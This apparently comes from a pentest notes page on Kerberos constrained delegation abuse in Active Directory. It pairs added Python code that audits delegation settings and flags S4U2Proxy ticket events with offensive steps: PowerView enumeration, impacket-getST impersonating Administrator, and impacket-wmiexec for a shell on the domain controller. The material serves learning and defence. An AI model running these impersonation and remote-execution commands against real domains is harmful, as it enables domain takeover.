Constrained Delegation Attack

Last modified: 2024-02-18

Active Directory Kerberos Windows

If a compromised account has the Kerberos constrained delegation right, it can impersonate another user to request a Kerberos service ticket for one of the services it is allowed to delegate to, and then use that ticket, for example to sign in to the service as the impersonated user.

Investigation

Check if Kerberos Constrained Delegation Is Enabled for a User

Reference: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites

# PowerView: list accounts whose msDS-AllowedToDelegateTo attribute is set
Get-NetUser -TrustedToAuth
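The PowerView command above only lists the accounts; deciding which of them matter takes the same attributes it reads (msDS-AllowedToDelegateTo and the userAccountControl flags) plus a view of where the allowed targets point. The following audit routine is an added example, not part of the original notes or of PowerView; the account records, the tier-0 service-class list and the domain controller host list are constructed assumptions, and in a real audit the records would come from an LDAP query such as (msDS-AllowedToDelegateTo=*).

```python
"""Rank accounts configured for Kerberos constrained delegation by risk.

Added example (not from the original notes). Flags, in decreasing order:
  - constrained delegation to a tier-0 service on a domain controller with
    protocol transition enabled (the exact setup the getST step relies on),
  - unconstrained delegation, or constrained delegation with only one of
    the two aggravating factors,
  - privileged accounts that can still be impersonated because they are
    not marked "Account is sensitive and cannot be delegated".
"""
from dataclasses import dataclass, field

# userAccountControl flag values (documented in MS-ADTS / MS-SAMR).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # account is sensitive and cannot be delegated
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self permitted)
NORMAL_ACCOUNT = 0x200

# Assumption: service classes that hand over broad control of a DC.
TIER0_SERVICE_CLASSES = {"cifs", "ldap", "host", "http", "mssqlsvc"}


@dataclass
class Account:
    sam: str
    uac: int
    allowed_to_delegate_to: list[str] = field(default_factory=list)
    privileged: bool = False  # e.g. Domain Admins membership, resolved separately


@dataclass
class Finding:
    account: str
    severity: str
    reason: str


def audit(accounts, dc_hosts):
    """Return one Finding per risky configuration found in `accounts`."""
    findings = []
    dc_hosts = {h.lower() for h in dc_hosts}
    for a in accounts:
        if a.privileged and not a.uac & NOT_DELEGATED:
            findings.append(Finding(a.sam, "medium",
                                    "privileged account is not marked NOT_DELEGATED"))
        if a.uac & TRUSTED_FOR_DELEGATION:
            findings.append(Finding(a.sam, "high", "unconstrained delegation enabled"))
        if not a.allowed_to_delegate_to:
            continue
        transition = bool(a.uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
        for spn in a.allowed_to_delegate_to:
            svc_class, _, host = spn.partition("/")
            host = host.split(":")[0].lower()  # strip optional port suffix
            tier0 = svc_class.lower() in TIER0_SERVICE_CLASSES and host in dc_hosts
            if tier0 and transition:
                sev = "critical"
            elif tier0 or transition:
                sev = "high"
            else:
                sev = "low"
            reason = f"constrained delegation to {spn}"
            if transition:
                reason += " with protocol transition"
            findings.append(Finding(a.sam, sev, reason))
    return findings


# Constructed sample directory data (not taken from any real domain).
SAMPLE_ACCOUNTS = [
    Account("Administrator", NORMAL_ACCOUNT, privileged=True),
    Account("svc_web", NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
            ["cifs/dc.example.local"]),
    Account("svc_backup", NORMAL_ACCOUNT, ["cifs/fileserver.example.local"]),
    Account("svc_legacy", NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION),
]
SAMPLE_DC_HOSTS = ["dc.example.local"]


def run_sample():
    return audit(SAMPLE_ACCOUNTS, SAMPLE_DC_HOSTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.severity:8} {f.account:15} {f.reason}")
```

The "critical" case is exactly the configuration the exploit steps later on this page need: a service account allowed to delegate to cifs on the domain controller with protocol transition turned on. Marking privileged accounts NOT_DELEGATED (or putting them in Protected Users) removes them as impersonation targets regardless of which service accounts are misconfigured.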

Exploit

1. Request Service Ticket for Another User

The target SPN must be one the compromised account is allowed to delegate to.

# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName

2. Use the Service Ticket

After obtaining the service ticket, we can use it for further pentesting.
Set the environment variable below so Kerberos-aware tools pick up the ticket cache:

export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing the cached tickets.
# If the klist command is not found, install it with `apt install krb5-user`
klist

Log in to Services with Kerberos Auth

# -k: Use Kerberos Auth
# -no-pass: No password
impacket-wmiexec example.local/Administrator@example.local -k -no-pass
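On the domain controller, the ticket request in step 1 shows up as a Kerberos service-ticket event (event ID 4769) whose "Transited Services" field is populated, because S4U2Proxy records the delegating service there; ordinary ticket requests leave it empty. The detector below is an added example, not part of the original notes or of impacket; the event texts are constructed and trimmed to the fields the check reads, and the protected-account and domain-controller lists are assumptions.

```python
"""Flag S4U2Proxy (constrained delegation) service-ticket requests.

Added example (not from the original notes). Parses simplified 4769 event
text, treats a non-empty "Transited Services" field as evidence of a
delegated request, and raises the severity when the ticket is for a domain
controller's service account or the subject is a protected account.
"""
import re

FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s*(.*)$")


def parse_4769(text):
    """Parse 'Field: value' lines of a (constructed, simplified) 4769 event."""
    rec = {}
    for line in text.strip().splitlines():
        m = FIELD_RE.match(line)
        if m:
            rec[m.group(1).strip()] = m.group(2).strip()
    return rec


def is_s4u2proxy(rec):
    """Transited Services is '-' or empty unless delegation was used."""
    return rec.get("Transited Services", "-").strip() not in ("", "-")


def classify(rec, protected_accounts, dc_accounts):
    """Return None for ordinary requests, else (severity, reason)."""
    if not is_s4u2proxy(rec):
        return None
    account = rec.get("Account Name", "").split("@")[0].lower()
    service = rec.get("Service Name", "").lower()
    via = rec.get("Transited Services", "")
    hits = []
    if service in {d.lower() for d in dc_accounts}:
        hits.append("ticket for a domain controller service account")
    if account in {p.lower() for p in protected_accounts}:
        hits.append("protected account in the request")
    if len(hits) == 2:
        sev = "critical"
    elif hits:
        sev = "high"
    else:
        sev = "info"
    return sev, f"S4U2Proxy via {via}: " + ("; ".join(hits) or "delegated request")


def scan(events, protected_accounts, dc_accounts):
    """Classify every event; returns list of (event id, severity, reason)."""
    results = []
    for i, text in enumerate(events):
        verdict = classify(parse_4769(text), protected_accounts, dc_accounts)
        if verdict:
            results.append((i, verdict[0], verdict[1]))
    return results


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    """
    Account Name: jdoe@EXAMPLE.LOCAL
    Service Name: FILE01$
    Transited Services: -
    """,
    """
    Account Name: Administrator@EXAMPLE.LOCAL
    Service Name: DC$
    Transited Services: http/web.example.local@EXAMPLE.LOCAL
    """,
    """
    Account Name: jdoe@EXAMPLE.LOCAL
    Service Name: FILE01$
    Transited Services: http/web.example.local@EXAMPLE.LOCAL
    """,
]
PROTECTED_ACCOUNTS = ["Administrator"]   # assumption: tier-0 user list
DC_ACCOUNTS = ["DC$"]                    # assumption: DC computer accounts


def run_sample():
    return scan(SAMPLE_EVENTS, PROTECTED_ACCOUNTS, DC_ACCOUNTS)


if __name__ == "__main__":
    for idx, sev, reason in run_sample():
        print(f"event {idx}: {sev:8} {reason}")
```

Every delegated request is worth recording, since legitimate constrained delegation is usually limited to a known, small set of service accounts and targets; a request that names a domain controller's service account and a privileged user at once matches the page's getST step and should page someone.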